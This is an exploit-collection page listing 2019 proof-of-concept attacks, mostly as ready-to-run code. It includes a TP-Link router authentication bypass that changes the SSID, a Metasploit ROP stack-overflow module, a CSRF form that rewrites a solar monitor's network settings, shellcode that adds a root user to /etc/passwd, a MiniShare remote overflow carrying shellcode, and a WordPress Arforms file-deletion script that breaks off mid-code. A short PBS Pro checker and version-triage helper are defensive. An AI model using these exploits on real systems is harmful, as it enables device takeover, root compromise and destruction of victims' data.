Channel: Exploit Collector

Foscam Video Management System 1.1.6.6 Denial Of Service


Foscam Video Management System version 1.1.6.6 denial of service proof of concept exploit.


MD5 | 1dcb5cf1a577e9f3e59bc80beea37d24

# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)
# Author: Alessandro Magnosi
# Date: 2019-10-09
# Vendor Homepage: https://www.foscam.com/
# Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5
# Tested Version: 1.1.6.6
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it

# Steps to Produce the Crash:
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"
# 6.- Copy the content of the file into UID
# 7.- Click on Login Check
# 8.- Crashed

#!/usr/bin/python

buffer = "A" * 5000
f = open ("FoscamVMS1.1.6.txt", "w")
f.write(buffer)
f.close()


PBS Professional 19.2.3 Authentication Bypass


PBS Professional versions 19.2.3 and below suffer from an authentication bypass vulnerability.


MD5 | faf03e1e7aba5f5325fea4d214fc85ef

===========================================================
PBS Professional MoM Authentication Bypass (CVE-2019-15719)
===========================================================

* Software: PBS Professional
* Affected Versions: All versions up to and including 19.2.3
* Vendor: Altair Engineering, Inc
* CVE Reference: CVE-2019-15719
* Severity: CVSS 9.0 [CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H]
* Author: John Fitzpatrick
* Date: 2019-10-08


Description
===========

HPCsec have identified a vulnerability in PBS Pro which allows for arbitrary code execution on any node running the pbs_mom service. This vulnerability can be exploited by anyone in a position to communicate with the pbs_mom service from an authorized node within the cluster. Exploitation of this issue allows for arbitrary code execution as any other user including as root, even in installations where root is not permitted to submit jobs.

This issue arises as a result of the pbs_mom service failing to apply a necessary security check before handling instructions sent to it.

By default the pbs_mom service runs on TCP port 15002. The following code can be run to check whether a mom is vulnerable to this issue:

---BEGIN CODE::python---

import socket
import sys

if len(sys.argv) < 2:
    print("ERROR: Please specify the address of pbs_mom")
    sys.exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    # pbs_mom listens on TCP port 15002 by default
    s.connect((sys.argv[1], 15002))
    s.send(b"+2+1+1+1x+1x+1x2+222+15+1x+0+1x+02+24+1x+01+1x+02+12+1x+0+1x+02+14+1x+0+1x+02+" +
           b"131+1x+0+1x+02+411+1x+01+1x+02+241+1x+01+1x+02+261+1x+01+1x+02+12+1x+0+1x+02+1" +
           b"31+1x+0+1x+02+421+1x+01+1x+02+221+1x+1+1x+112+102+251+1x+1+1x+1x2+102+221+1x+0" +
           b"+1x2+103+3351+1x+01+1x+02+13+1x+0+1x+02+14+1x+0+1x2+102+19+1x+0+1x+02+12+1x+0+" +
           b"11+02+181+1x+0+210+02+29+6hpcsec+01+1x+02+141+1x+0+11+0+0")
    # Decode so the substring checks below work on both Python 2 and Python 3
    response = s.recv(64).decode("latin-1")

    if "Invalid" in response:
        print("Vulnerable = NO")
    elif "Access" in response:
        print("Vulnerable = UNKNOWN (try again from a permitted host, e.g. another mom or the pbs server)")
    # Test each keyword explicitly; `"Undefined" or "System" in response` is always true
    elif "Undefined" in response or "System" in response:
        print("Vulnerable = YES")
    else:
        print("Vulnerable = UNKNOWN (unhandled response)")
except Exception as e:
    print("ERROR: " + str(e))
finally:
    s.close()

# Download here: https://files.hpcsec.com/utilities/check-CVE-2019-15719.py

---END CODE---


Solution
========

A fix for this issue has been incorporated into all currently supported versions of PBS Professional. Fixes are available in the following versions:

* 13.0.412
* 14.2.7
* 18.2.5
* 19.2.4 and newer

A fix is now available on GitHub for users of the open source 19.1.X branch. The fix is incorporated into the current 19.1.2 release with no change to the version number. Therefore earlier instances of 19.1.2 are vulnerable.

Those running earlier versions should update to the latest fixed version in the relevant branch.

The updated versions are available from the Altair PBS Professional download site (https://www.pbspro.org/Download.aspx#download).
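
The fixed-version list above can be applied to a node inventory as a triage check. The following is an added example, not part of the HPCsec advisory or of PBS Professional; the function names and the sample inventory are constructed for illustration, and reporting 19.1.x builds numbered 19.1.2 or later as "verify-build" is an assumption, made because the version number alone cannot confirm the fix in that branch.

```python
import re

# Fixed releases per supported branch, as listed in the Solution section above.
FIXED = {(13, 0): 412, (14, 2): 7, (18, 2): 5, (19, 2): 4}
# "Affected Versions: All versions up to and including 19.2.3"
LAST_AFFECTED = (19, 2, 3)

# Constructed sample inventory: "<host> <reported PBS version>" per line.
SAMPLE_INVENTORY = """\
node01 18.2.3
node02 18.2.5
node03 19.1.2
node04 19.2.4
node05 14.1.0
"""


def parse_version(text):
    """Return (major, minor, patch) from a string such as '18.2.3'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version found in %r" % text)
    return tuple(int(g) for g in m.groups())


def triage(text):
    """Classify a version as 'fixed', 'vulnerable' or 'verify-build'."""
    major, minor, patch = parse_version(text)
    # Open source 19.1.x: the fix went into 19.1.2 without a version bump,
    # so the number cannot tell a patched build from an unpatched one.
    if (major, minor) == (19, 1):
        return "vulnerable" if patch < 2 else "verify-build"
    # Supported branches with a named fixed release.
    if (major, minor) in FIXED:
        return "fixed" if patch >= FIXED[(major, minor)] else "vulnerable"
    # Any other branch: affected at or below 19.2.3, otherwise newer than the fix.
    return "vulnerable" if (major, minor, patch) <= LAST_AFFECTED else "fixed"


def triage_inventory(text):
    """Map each host in the inventory text to its triage status."""
    report = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        host, version = line.split(None, 1)
        report[host] = triage(version)
    return report


if __name__ == "__main__":
    for host, status in sorted(triage_inventory(SAMPLE_INVENTORY).items()):
        print(host, status)
```

Hosts reported as "verify-build" need their installed package compared against the current 19.1.2 release rather than a version-string check.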


Timeline
========

2019-08-22: Issue reported to Altair
2019-10-07: Patch available for all supported versions of PBS Pro
2019-10-08: HPCsec advisory published

================================================
https://www.hpcsec.com/2019/10/08/cve-2019-15719
================================================

TP-Link TL-WR1043ND 2 Authentication Bypass


TP-Link TL-WR1043ND 2 suffers from an authentication bypass vulnerability.


MD5 | dfcae729668c5864af9931fc50f06a0e

# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
# Date: 2019-06-20
# Exploit Author: Uriel Kosayev
# Vendor Homepage: https://www.tp-link.com
# Version: TL-WR1043ND V2
# Tested on: TL-WR1043ND V2
# CVE : CVE-2019-6971
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971

import requests

ascii = '''
__________ __ _ __
/_ __/ __ \ / / (_)___ / /__
/ / / /_/ /_____/ / / / __ \/ //_/
/ / / ____/_____/ /___/ / / / / ,<
/_/ /_/ /_____/_/_/ /_/_/|_|

'''
print(ascii)
Default_Gateway = raw_input("Enter your TP-Link router IP: ")

# Constants
url = 'http://'
url2 = '/userRpm/LoginRpm.htm?Save=Save'
full = url + Default_Gateway + url2
# full = str(full)

# The full GET request with the cookie authorization hijacked
req_header = {
'Host': '{}'.format(Default_Gateway),
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
'Connection': 'close',
'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
'Upgrade-Insecure-Requests': '1'
}

try:
    response = requests.get(full, headers=req_header).content
except requests.exceptions.ConnectionError:
    print("Enter a valid Default Gateway IP address\nExiting...")
    exit()
generate = response.split('/')[3] # Gets the randomized URL "session ID"


option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")

if option_1 == 1:

    if generate in response:
        print('Vulnerable!\n')
        option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
        if option_2 == 2:
            newssid = raw_input('New name: ')
            ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
                newssid)
            changessid_full = url + Default_Gateway + '/' + generate + ssid_url
            requests.get(changessid_full, headers=req_header)
            print('Changed to: {}'.format(newssid))
        else:
            print("Please choose the correct option.\nExiting...")
            exit()
    else:
        print('Not Vulnerable')
        exit()
else:
    print("Please choose the correct option.\nExiting...")
    exit()

ASX To MP3 Converter 3.1.3.7 Stack Overflow


This Metasploit module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7. By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC; Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC.


MD5 | 56c0508be45bebf5e6af39311de96c27

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info={})
super(update_info(info,
'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
'Description' => %q{
This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maxim Guslyaev', # EDB POC, Metasploit Module
],
'References' =>
[
[ 'CVE', '2017-15221' ],
[ 'EDB', '47468' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 Enterprise/10 Pro',
{
'Ret' => 0x1002D038 # RET
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x09\x0a"
},
'Privileged' => false,
'DisclosureDate' => "Oct 06 2019",
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
])
end

def exploit

buf = "http://"
buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"

## Save allocation type (0x1000) in EDX
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x11111111].pack("V")
buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
buf += [0x1002D493].pack("V") # POP EDX # RETN
buf += [0xEEEEFEEF].pack("V")
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x41414141].pack("V")

## Save the address of VirtualAlloc() in ESI
buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
buf += [0x41414141].pack("V")
buf += [0x41414141].pack("V")

## Save the size of the block in EBX
buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of (# ADD ESP,8 # RETN) in EBP
buf += [0x10031c6c].pack("V") # POP EBP # RETN
buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN

## Save memory protection code (0x40) in ECX
buf += [0x1002ca22].pack("V") # POP ECX # RETN
buf += [0xFFFFFFFF].pack("V")
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
buf += [0x1002e346].pack("V") # POP EDI # RETN
buf += [0x1002D038].pack("V") # RETN

## Save NOPs in EAX
#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
#buf += [0x90909090].pack("V") # nop

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
buf += [0x1002E516].pack("V") # POP EAX # RETN
buf += [0xA4E2F275].pack("V")
buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
buf += [0x10040ce5].pack("V") # PUSH EAX # RETN

buf += "\x90" * 4
buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
buf += "\x90" * 20
buf += payload.encoded

file_create(buf)

end
end

SMA Solar Technology AG Sunny WebBox 1.6 Cross Site Request Forgery


SMA Solar Technology AG Sunny WebBox device version 1.6 suffers from a cross site request forgery vulnerability.


MD5 | 5c250dd472b09481d04ded8dbb3c8eef

# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
# Date: 2019-10-08
# Exploit Author: Borja Merino and Eduardo Villaverde
# Vendor Homepage: https://www.sma.de
# Version: Firmware Version 1.6 and prior
# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)
# CVE : CVE-2019-13529
# ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01

<!-- Change any hidden value -->

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">
<input type='hidden' name='RadioButtonDhcp' value='off'>
<input type='hidden' name='IpAddr' value='1.1.1.1'>
<input type='hidden' name='SubnetMask' value='255.255.255.0'>
<input type='hidden' name='Gateway' value='1.1.1.1'>
<input type='hidden' name='DnsIpAddr' value='5.5.5.1'>
<input type='hidden' name='Dns2IpAddr' value='5.5.5.2'>
<input type='hidden' name='StaticNatPortHttp' value='80'>
<input type='hidden' name='WebserverPort' value='80'>
<input type='hidden' name='WebservicePort' value='80'>
<input type='hidden' name='RadioButtonModbus' value='off'>
<input type='hidden' name='ModbusPort' value='502'>
<input type='hidden' name='BConfirm' value='Confirmar'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

Linux/x86 Add User To /etc/passwd Shellcode


59 bytes small Linux/x86 add user to /etc/passwd shellcode.


MD5 | c39b7595c05915ce00df9e84bd13b4a4

# Exploit Title: Linux/x86 -  Add User to /etc/passwd Shellcode (59 bytes)
# Date: 2019-10-05
# Exploit Author: sagar.offsec (VL43CK)
# Guided by: Touhid M.Shaikh
# Designation: Security Consultant at SecureLayer7
# Website: https://www.sagaroffsec.com
# Tested on: Ubuntu i386 GNU/LINUX
# Shellcode Length: 59

----------------------(DESCRIPTION)----------------------------

This shellcode will first change /etc/passwd permission to 777 and then
add a user "vl43ck" in it with password "test" with root permissions.

----------------------(SHELLCODE DUMP)-------------------------
global _start

section .text
_start:

;chmod 777 /etc/passwd

xor eax, eax
push eax

push 0x64777373
push 0x61702f63
push 0x74652f2f
xor ebx, ebp
lea ebx, [esp]

xor ecx, ecx
mov cx, 0x1ff

mov al, 0xf
int 0x80

;add user in /etc/passwd

;open /etc/passwd

xor eax, eax
mov al, 5
xor ecx, ecx
mov cx, 2001Q
int 0x80

;write into /etc/passwd

xor ebx, ebx
mov ebx, eax

jmp short call_write
write:
pop ecx

xor eax, eax
xor edx, edx
mov dx, 132
mov al, 4
int 0x80

; close /etc/passwd

xor eax, eax
mov al, 6
int 0x80

;exit gracefully

push eax
xor eax, eax
mov al, 1
xor ebx, ebx
pop ebx
int 0x80

call_write:

call write
shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash"


----------------------(COMPILE)-------------------------

gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c

----------------------(C-Code)--------------------------

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";

int main(void)
{
    /* strlen() stops at the first NUL byte in the array */
    printf("Shellcode Length: %zu\n", strlen((char *)code));

    int (*ret)() = (int(*)())code;

    ret();

    return 0;
}

Microsoft Windows Kernel win32k.sys TTF Font Processing win32k!ulClearTypeFilter Pool Corruption


Microsoft Windows Kernel suffers from a TTF font processing win32k!ulClearTypeFilter pool corruption vulnerability in win32k.sys.


MD5 | 119f19b3c20bb86e4d4a2c8e4636479c


Microsoft Windows Kernel nt!MiOffsetToProtos NULL Pointer Dereference


The Microsoft Windows kernel suffers from a null pointer dereference vulnerability in nt!MiOffsetToProtos while parsing a malformed PE file.


MD5 | 00131f510a52f3d940c140421ce76ea4



Microsoft Windows Kernel CI!CipFixImageType Out-Of-Bounds Read


The Microsoft Windows kernel suffers from an out-of-bounds read vulnerability in CI!CipFixImageType while parsing a malformed PE file.


MD5 | 234236a84a29251053125f4a4e7b7d46


Microsoft Windows Kernel nt!MiParseImageLoadConfig Out-Of-Bounds Read


The Microsoft Windows kernel suffers from an out-of-bounds read in nt!MiParseImageLoadConfig while parsing a malformed PE file.


MD5 | ed96bcdeedbf757ded338f82d7252f0d


Microsoft Windows Kernel CI!HashKComputeFirstPageHash Out-Of-Bounds Read


The Microsoft Windows kernel suffers from an out-of-bounds read vulnerability in CI!HashKComputeFirstPageHash while parsing a malformed PE file.


MD5 | 2b4d1890b1779ec523e266b0696a2645


Microsoft Windows Kernel nt!MiRelocateImage Out-Of-Bounds Read


The Microsoft Windows kernel suffers from an out-of-bounds read vulnerability in nt!MiRelocateImage while parsing a malformed PE file.


MD5 | b11e264135a1ee9c14ee6d0a6b9be23a


MiniShare 1.4.1 CONNECT Remote Buffer Overflow


MiniShare version 1.4.1 CONNECT remote buffer overflow exploit.


MD5 | 464c128d19d3bc0920c09a679653418b

#!/usr/bin/env python
import socket
import struct
import os

# Exploit Title: MiniShare 1.4.1 'CONNECT' remote buffer overflow
# Date: 10/11/2019
# Exploit Author: Striker
# Vendor Homepage: https://sourceforge.net/projects/minishare/files/OldFiles/minishare-1.4.1.exe/download
# Version: 1.4.1
# Tested on: Windows XP Sp3
# MiniShare

host = "10.0.2.15"
port = 80


#bad characters = "\x00\x0d"
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21"
"\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41"
"\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61"
"\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81"
"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1"
"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1"
"\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
"\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -f python -v shellcode -b "\x00\x0d" BufferRegister=ESP
shellcode = b""
shellcode += b"\xbb\x6d\x07\x8f\xfd\x89\xe6\x31\xc9\xb1\x31"
shellcode += b"\x31\x5e\x13\x83\xc6\x04\x03\x5e\x62\xe5\x7a"
shellcode += b"\x01\x94\x6b\x84\xfa\x64\x0c\x0c\x1f\x55\x0c"
shellcode += b"\x6a\x6b\xc5\xbc\xf8\x39\xe9\x37\xac\xa9\x7a"
shellcode += b"\x35\x79\xdd\xcb\xf0\x5f\xd0\xcc\xa9\x9c\x73"
shellcode += b"\x4e\xb0\xf0\x53\x6f\x7b\x05\x95\xa8\x66\xe4"
shellcode += b"\xc7\x61\xec\x5b\xf8\x06\xb8\x67\x73\x54\x2c"
shellcode += b"\xe0\x60\x2c\x4f\xc1\x36\x27\x16\xc1\xb9\xe4"
shellcode += b"\x22\x48\xa2\xe9\x0f\x02\x59\xd9\xe4\x95\x8b"
shellcode += b"\x10\x04\x39\xf2\x9d\xf7\x43\x32\x19\xe8\x31"
shellcode += b"\x4a\x5a\x95\x41\x89\x21\x41\xc7\x0a\x81\x02"
shellcode += b"\x7f\xf7\x30\xc6\xe6\x7c\x3e\xa3\x6d\xda\x22"
shellcode += b"\x32\xa1\x50\x5e\xbf\x44\xb7\xd7\xfb\x62\x13"
shellcode += b"\xbc\x58\x0a\x02\x18\x0e\x33\x54\xc3\xef\x91"
shellcode += b"\x1e\xe9\xe4\xab\x7c\x67\xfa\x3e\xfb\xc5\xfc"
shellcode += b"\x40\x04\x79\x95\x71\x8f\x16\xe2\x8d\x5a\x53"
shellcode += b"\x1c\xc4\xc7\xf5\xb5\x81\x9d\x44\xd8\x31\x48"
shellcode += b"\x8a\xe5\xb1\x79\x72\x12\xa9\x0b\x77\x5e\x6d"
shellcode += b"\xe7\x05\xcf\x18\x07\xba\xf0\x08\x64\x5d\x63"
shellcode += b"\xd0\x45\xf8\x03\x73\x9a"

#0x76f401cb : jmp esp | {PAGE_EXECUTE_READ} [DNSAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6089 (C:\WINDOWS\system32\DNSAPI.dll)
jmp = "\xcb\x01\xf4\x76"

#payload = pattern
payload = "A" * 1783
payload += jmp
#payload += badchars
payload += shellcode
payload += "C" * (5000 - len(payload))

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Sending exploit..."
    s.connect((host, port))
    s.send("CONNECT " + payload + "\r\n\r\n")
    s.close()
except:
    print "Connection error"

WordPress Arforms 3.7.1 Directory Traversal


WordPress Arforms plugin version 3.7.1 suffers from a directory traversal vulnerability.


MD5 | 3f96d0c2627b01ec79ccb7591a33a60b

# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal 
# Date: 2019-09-27
# Exploit Author: Ahmad Almorabea
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
# Software Link: https://www.arformsplugin.com/documentation/changelog/
# Version: 3.7.1
# CVE ID: CVE-2019-16902

#**************Start Notes**************
# Run the script by giving the script name followed by the URL; the URL should point at the directory that contains the WordPress folders.
# Example: exploit.rb www.test.com, where the site has the WordPress folders under it, such as www.test.com/wp-content.
# Pay attention to the 3 numbers at the beginning; you may need to change them for other forms. In this script the value is 143.
# In other forms it may be different, so change it accordingly.
# This version of the software is vulnerable to a path traversal attack, so you can delete files if you know the path, such as ../../ and so on.
# There is a request file with this script; make sure to put it in the same folder.
#**************End Notes****************

#!/usr/bin/env ruby

require "net/http"
require 'colorize'

$host = ARGV[0] || ""
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"


def start_function ()

puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
name = STDIN.gets

if $host == ""
puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
exit
end


check_existence_arform_folder
execute_deletion_attack

puts "Done ... see ya " + name

end


def send_checks(files_names)




j = 1
while j <= files_names.length-1

uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS

request = Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "en-US,en;q=0.5"
request["Accept-Encoding"] = "gzip, deflate"
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"


begin

response = http.request(request).code
puts "The File " + files_names[j] + " has the response code of " + response
rescue Exception => e
puts "[!] Failed!"
puts e
end
j = j+1
end
end


def check_existence_arform_folder ()



path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
$i = 0
results = []

while $i <= path_array.length-1

uri = URI.parse("http://#{$host}/#{path_array[$i]}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
results[$i] = response.code
#puts"response code is : " + response.code

$i +=1

end

puts "****************************************************"

if results[0] == "200" || results[0] =="301"

puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
else
puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
exit
end

if (results[1] == "200" || results[1] == "301")

puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
else

puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]

end
puts "****************************************************"



end


def execute_deletion_attack ()



puts "How many file you want to delete my man"
amount = STDIN.gets.chomp.to_i

if(amount == 0)
puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
exit
end

file_names = []
file_names[0] = "143_772_1569713145702_temp3.txt"
j = 1
while j <= amount.to_i
puts "Name of the file number " + j.to_s
file_names[j] = STDIN.gets
file_names[j].strip!
j = j+1
end


uri = URI.parse("http://#{$host}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie




$i = 0
while $i <= file_names.length-1

puts "Starting the Attack Journey .. ".green

uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
